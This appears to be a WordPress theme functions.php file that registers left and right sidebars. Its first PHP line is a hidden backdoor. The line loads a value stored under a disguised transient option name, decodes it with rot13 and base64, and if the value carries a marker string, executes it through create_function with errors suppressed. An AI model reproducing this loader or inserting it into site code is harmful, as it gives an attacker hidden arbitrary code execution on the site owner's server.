<?php
$z=get_option("_transient_feed_5b6ea558b4b07c0bd39223220babc3a8"); $z=base64_decode(str_rot13($z)); if(strpos($z,"9D1B88F0")!==false){ $_z=create_function("",$z); @$_z(); }

if ( function_exists('register_sidebar') )
	register_sidebar(array(
	'name'=>'Left Sidebar',
        'before_widget' => '',
        'after_widget' => '',
        'before_title' => '<div class="title"><h1>',
        'after_title' => '</h1></div>',
    ));
?>
<?php
if ( function_exists('register_sidebar') )
	register_sidebar(array(
	'name'=>'Right Sidebar',
        'before_widget' => '',
        'after_widget' => '',
        'before_title' => '<div class="title"><h1>',
        'after_title' => '</h1>
		</div>',
    ));
?>